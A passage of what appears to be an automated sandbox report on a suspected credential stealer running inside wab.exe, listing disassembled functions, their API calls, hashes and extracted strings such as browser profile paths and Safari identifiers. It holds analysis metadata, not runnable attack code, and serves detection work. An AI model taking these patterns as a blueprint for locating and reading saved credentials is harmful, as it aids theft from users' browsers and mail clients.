                                                                                                                                                                                                          Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2081463915-0
                                                                                                                                                                                                          • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2136311172-0
                                                                                                                                                                                                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1936579350-0
                                                                                                                                                                                                          • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2565263379-0
                                                                                                                                                                                                          • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                          • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004098B5
                                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2014503067-0
                                                                                                                                                                                                          • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                                          • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                                                                                                                                                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,75B9DF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                                                                                                                                                          • String ID: OsError 0x%x (%u)
                                                                                                                                                                                                          • API String ID: 403622227-2664311388
                                                                                                                                                                                                          • Opcode ID: 9ff8ff26e0a1215cc788cdf92f51d6490e6f9aaf937717d3b4e57f86d92aad15
                                                                                                                                                                                                          • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ff8ff26e0a1215cc788cdf92f51d6490e6f9aaf937717d3b4e57f86d92aad15
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040269B
                                                                                                                                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004026FF
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                                                                                                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                                          • API String ID: 577499730-1134094380
                                                                                                                                                                                                          • Opcode ID: 6c080f988ca695101769a9a2af36e28a34baa8032f69e666e27906f655dd48f7
                                                                                                                                                                                                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c080f988ca695101769a9a2af36e28a34baa8032f69e666e27906f655dd48f7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                                          • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                                          • API String ID: 2787044678-1921111777
                                                                                                                                                                                                          • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                          • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                                          • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                                          • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                                          • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                          • API String ID: 2080319088-3046471546
                                                                                                                                                                                                          • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                          • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                                          • memset.MSVCRT ref: 00413292
                                                                                                                                                                                                          • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                                          • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                                          • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                                          • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                                          • memset.MSVCRT ref: 00413310
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                                          • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004133FC
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                          • API String ID: 4111938811-1819279800
                                                                                                                                                                                                          • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                          • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 829165378-0
                                                                                                                                                                                                          • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00404172
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                          • memset.MSVCRT ref: 00404200
                                                                                                                                                                                                          • memset.MSVCRT ref: 00404215
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                                          • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                                          • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                                          • API String ID: 2454223109-1580313836
                                                                                                                                                                                                          • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
